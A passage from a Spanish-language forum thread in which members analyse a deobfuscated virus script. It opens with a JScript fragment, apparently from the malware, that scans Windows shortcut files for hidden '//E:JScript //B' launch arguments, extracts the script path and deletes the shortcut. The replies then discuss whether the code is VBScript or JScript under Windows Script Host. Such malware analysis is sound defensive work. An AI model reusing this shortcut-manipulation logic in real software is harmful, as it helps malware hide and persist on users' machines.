            lks = lnks.item() + "";
            if (lks.substring(lks.length - 4, lks.length).toLowerCase() == ".lnk") {
                lnka = b.CreateShortcut(lnks.item()).Arguments;
                if (lnka.search("//E:JScript //B -ns") != -1) {
                    cshc = lnka.substring(lnka.indexOf('"') + 1, lnka.lastIndexOf('"'));
                    a.DeleteFile(lnks.item());
                }
            }
        } catch (e) {}
    }
    return cshc;
}


« Última modificación: 13 Julio 2015, 17:09 pm por Mad Antrax »	En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.

danny920825

Desconectado

Mensajes: 175

Re: [Ayuda] descifrando un virus

« Respuesta #2 en: 11 Julio 2015, 19:05 pm »

Gracias. Eres el mejor!!


	En línea

"Los que reniegan de Dios es por desesperación de no encontrarlo".
Miguel de Unamuno

dRak0

Desconectado

Mensajes: 234

Re: [Ayuda] descifrando un virus

« Respuesta #3 en: 12 Julio 2015, 09:45 am »

Criptoanalisis,diras.


	En línea

Mad Antrax

Colaborador

Desconectado

Mensajes: 2.166

Cheats y Trainers para todos!

Re: [Ayuda] descifrando un virus

« Respuesta #4 en: 13 Julio 2015, 09:33 am »

excelente trabajo engel lex, ahora solo falta analizar las funciones que ejecuta el script!


	En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.

danny920825

Desconectado

Mensajes: 175

Re: [Ayuda] descifrando un virus

« Respuesta #5 en: 13 Julio 2015, 14:52 pm »

Y todo eso es javascript?? o sea, que se puede utilizar un lenguaje de programacion web para aplicaciones de escritorio? Por favor, alguien que explique las funciones que no las entiendo todas


	En línea

"Los que reniegan de Dios es por desesperación de no encontrarlo".
Miguel de Unamuno

engel lex

Moderador Global

Desconectado

Mensajes: 15.514

Re: [Ayuda] descifrando un virus

« Respuesta #6 en: 13 Julio 2015, 15:39 pm »

repito mi comentario

Citar

no sabia que el vbs se parecía tanto el js

esto no es js (javascript) es vbs (visual basic script), solo sirve en local


	En línea

Mad Antrax

Colaborador

Desconectado

Mensajes: 2.166

Cheats y Trainers para todos!

Re: [Ayuda] descifrando un virus

« Respuesta #7 en: 13 Julio 2015, 16:34 pm »

Cita de: engel lex en 13 Julio 2015, 15:39 pm

repito mi comentario

esto no es js (javascript) es vbs (visual basic script), solo sirve en local

En realidad ese código es javascript. El intérprete de script de Windows (wscript + cscript) pueden interpretar (ejecutar) VBS y JS. VOy a reversas las funciones para ver que hace exactamente, aunque no estoy muy familiarizado con JS...

Saludos


	En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.

engel lex

Moderador Global

Desconectado

Mensajes: 15.514

Re: [Ayuda] descifrando un virus

« Respuesta #8 en: 13 Julio 2015, 17:00 pm »

windows interpreta js?

"WScript" puede ser usado por jscript?

por eso asumo que es vbs


	En línea

Mad Antrax

Colaborador

Desconectado

Mensajes: 2.166

Cheats y Trainers para todos!

Re: [Ayuda] descifrando un virus

« Respuesta #9 en: 13 Julio 2015, 17:06 pm »

Cita de: engel lex en 13 Julio 2015, 17:00 pm

windows interpreta js?

"WScript" puede ser usado por jscript?

por eso asumo que es vbs

Exacto, el motor de interprete de script (WScript.exe / CScript.exe) interpreta tanto VBS como JS, y sus variantes VBE, JSE, etc... el icono se diferencia por un script verde (VBS) o amarillo (JS). Si te fijas, la sintaxis original de VB/VBA/VBS no incluye llaves ({}) para designar statement, en su lugar se utiliza el comodón "End", las llaves son usadas en lenguajes como C/C++ y JS (entre mucho otros).

Otra pista la tienes en que JS necesita un caracter para indicar el fin de una línea ( ";" ) mientras que VB/VBS no necesita dicho carácter

Te he editado el post, indicando que el geshi es JS en lugar de VBS, ahora aparece correctamente formateado


« Última modificación: 13 Julio 2015, 17:09 pm por Mad Antrax »	En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.

Páginas: [1] 2 3

Ir a:

Mensajes similares
	Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
	Cifrando y Descifrando C# .NET (C#, VB.NET, ASP)	junxcosio	6	16,157	15 Enero 2010, 10:41 am por junxcosio
	Descifrando un algoritmo PHP	Feedeex	4	4,174	29 Diciembre 2010, 17:20 pm por WHK
	Ayuda! Descifrando clave wep Con Acceso limitado 200mil ivs... Wireless en Linux	Gospi	1	3,244	7 Octubre 2012, 08:04 am por Sh4k4
	Chip TPM y descifrando patron Criptografía	pindonga123	3	31,882	22 Octubre 2014, 20:53 pm por pindonga123
	Descifrando Malwared Análisis y Diseño de Malware	s3tH	1	3,369	11 Noviembre 2015, 21:29 pm por _TTFH_3500